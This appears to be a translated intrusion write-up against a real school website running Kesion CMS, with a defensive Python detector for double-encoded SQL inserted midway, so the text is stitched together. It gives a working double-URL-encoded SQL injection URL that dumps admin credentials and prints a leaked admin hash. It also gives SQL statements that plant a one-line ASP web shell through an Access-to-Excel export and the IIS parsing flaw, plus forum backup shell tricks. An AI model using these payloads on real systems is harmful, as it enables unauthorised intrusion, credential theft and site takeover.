The cause is very simple. Why did I receive this message in my QQ mailbox subscription?
A post-00s "Bai Fumei" says: "why are the post-90s still single?"
They even run a school.
XX lab school... (In the spirit of learning, everything is redacted throughout.)
Baidu it.
The website is www.****.cn
IIS/6.0
The website generates static pages...
Let's look at the backend....
The backend has been modified from a CMS... So which CMS is it???
This is Kesion's CMS... How do we know? Because
appending /8 to the site's backend path reveals its true face.
Now that we know it's Kesion, we can work with it properly.
Baidu "Kesion vulnerability"
Vulnerability submitted to wooyun
Haha, RP (luck)
Submission time:
Public Date:
Specific: http://www.bkjia.com/Article/201207/139333.html
Injection statement: %') union select 1,2,username+'|'+password from KS_Admin
The converted form is as follows:
/Plus/ajaxs.asp?Action=GetRelativeItem&key=search%2525%2527%2529%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2531%252c%2532%252c%2575%2573%2565%2572%256e%2561%256d%2565%252b%2527%257c%2527%252b%2570%2561%2573%2573%256f%2577%2572%2564%2520%2566%2572%256f%256d%2520%254b%2553%255f%2541%256d%2564%maid%2500
This code dumps the admin account and password.
This shows how to perform transcoding, but some people may not know how to perform transcoding ....
In fact, this is a double transcoding.
First transcoding:
union becomes %75%6E%69%6F%6E after the first URL encoding.
Second transcoding:
For the second pass we URL-encode again using the GB2312 charset.
%75%6E%69%6F%6E becomes %2575%256E%2569%256F%256E after the second encoding.
From this you should understand how to convert back and forth ~
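The double transcoding described above is only half the story; the other half is why a filter that decodes once misses it. The following is an added example (not code from the original write-up) that takes the defender's view: it percent-decodes a query-string parameter repeatedly until the value stops changing, counts how many rounds were needed, and flags a parameter that needed two or more rounds and then contains SQL keywords. The keyword list, the round limit and the sample query strings are constructed for this example; the `Action=GetRelativeItem&key=` parameter names come from the page.

```python
"""Detect double URL-encoded parameters that hide SQL keywords.

Added example, not code from the original post.  A WAF or log parser
that unquotes a value once sees "%75%6E%69%6F%6E" and does not match
"union"; decoding until the value is stable closes that gap.
"""
import re
from urllib.parse import unquote

# Upper bound on decode rounds: honest input settles in one round,
# the trick on this page needs two.  (Assumed limit for this example.)
MAX_DECODE_ROUNDS = 4

# Minimal keyword set for the demonstration (assumption, not a full ruleset).
SQLI_KEYWORDS = re.compile(
    r"\b(union|select|from|insert|update|delete|drop)\b", re.IGNORECASE
)


def fully_decode(value, max_rounds=MAX_DECODE_ROUNDS):
    """Percent-decode `value` until it no longer changes.

    Returns (decoded_value, rounds_needed).  rounds_needed is the number
    of decode passes that actually changed the string, so a plain value
    reports 0, single-encoded reports 1, double-encoded reports 2.
    """
    current = value
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
        rounds += 1
    return current, rounds


def inspect_param(raw_value):
    """Decode one raw (still percent-encoded) parameter and classify it."""
    decoded, rounds = fully_decode(raw_value)
    keywords = sorted({m.lower() for m in SQLI_KEYWORDS.findall(decoded)})
    return {
        "decoded": decoded,
        "rounds": rounds,
        "keywords": keywords,
        # Only the double-encoding evasion is flagged here; single-encoded
        # injection attempts are left to the ordinary, once-decoded rules.
        "suspicious": rounds >= 2 and bool(keywords),
    }


def scan_query_string(query_string):
    """Return the names of parameters whose value is double-encoded SQL.

    The query string is split by hand instead of with parse_qsl so that
    the raw, undecoded value reaches fully_decode and the round count is
    meaningful.
    """
    flagged = []
    for pair in query_string.split("&"):
        name, _, raw = pair.partition("=")
        if inspect_param(raw)["suspicious"]:
            flagged.append(name)
    return flagged


if __name__ == "__main__":
    # Constructed sample: "' union select" encoded twice, as in the write-up.
    sample = ("Action=GetRelativeItem&key=%2527%2520%2575%256E%2569%256F%256E"
              "%2520%2573%2565%256C%2565%2563%2574")
    for name, raw in (p.partition("=")[::2] for p in sample.split("&")):
        print(name, inspect_param(raw))
    print("flagged:", scan_query_string(sample))
```

The round counter is the useful signal: legitimate clients send a value encoded once, so a parameter that only turns into SQL after a second pass is worth logging even when the ordinary signature rules stay silent.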
Now we have the account and password, but we don't have the authentication code.
<option value='1|2'>admin|8ae2232b1cd2bd90</option>
The authentication code is stored in the Conn.asp file.
We just need to read that file.
In other words, having the account and password still isn't enough.
----------------------------------------------------------------------------------------
Registration is disabled on the website.
A BBS with registration disabled.
With a BBS backend.
Powered by Dvbbs.net.
Forums...
Ah ah
The administrator has also blocked downloads of the .mdb suffix.
It seems this administrator knows what he's doing...
The main site has been waiting a long time ''''
Remember the address we just found?
Why didn't we start from this place?
Silly.
Everything default, you understand.
Let's see what we can see...
We're in.
Now it's time to get a shell.
Going straight at the main site is a no-go.
Because every site on this server is "smart", you know what I mean!
Getting a shell from the 8.0 backend relies on an SQL statement.
Normally
Run the code:
1. create table cmd (a varchar(50))
2. insert into cmd (a) values ('<%execute request(chr(35))%>')
3. select * into [a] in 'd:\wwwroot\m3loee.asa).xls' 'excel 4.0;' from cmd;
4. drop table cmd;
Explanation:
1. create table cmd (a varchar(50)) creates a table named cmd with one field a, of type varchar with a length of 50 characters.
2. insert into cmd (a) values ('<%execute request(chr(35))%>') inserts a one-line Trojan with the password # into field a of table cmd.
3. select * into [a] in 'd:\wwwroot\m3loee.asa).xls' 'excel 4.0;' from cmd exports the contents of the cmd table to an Excel file at the physical path. Why Excel? Because an ACCESS database cannot export to other, more dangerous formats. Once exported to Excel, the IIS parsing vulnerability turns it into our pony.
4. drop table cmd deletes the table.
But on executing the third statement... a problem appears.
We're dead.
Another way is simpler:
SELECT '<%execute request("a")%>' into [0ldgui] in 'd:\wwwroot\*****\wwwroot\8+1.asp(1.asp)' 'excel 8.0;' from 0ldgui
The database below is read-only.
Error Code  | Source                        | Description                                              | Help    | Help documentation
-2147217911 | Microsoft JET Database Engine | Cannot be updated. The database or object is read-only.  | 5003027 |
It seems a shell can't be obtained from the backend.
Even if we get the target site's authentication code, we can't get a shell from the backend.
Privileges can't be escalated from a neighbouring site either.
Full path of the main database: D:\wwwroot\***\wwwroot\8\KS_Data\KesionCMS8.mdb
Full path of the collection database: D:\wwwroot\***\wwwroot\KS_Data\Collect\KS_Collect.Mdb
The experts on 90sec may be able to exploit a Kesion vulnerability.
However, the PHP environment isn't installed on the local machine.
We have to note that...
There is still hope for one of the 134 sites....
Let's talk about the process of getting a shell from the backend.
There is a backup function in the backend, but the thing is, there's no upload.
How do you get a picture in without an upload?
No upload, but the database turns out to be .asp.
We add an encrypted one-liner in the backend.
Back up the website.
That's the way.
However, the website permissions are completely locked down and there's no way.
There is no way to upload to the website.
Uploading a Trojan triggers a firewall interception prompt.
The neighbouring-site route is dead too.
The website's data permission is read-only. I guess we can't get the authentication code in time to get a shell.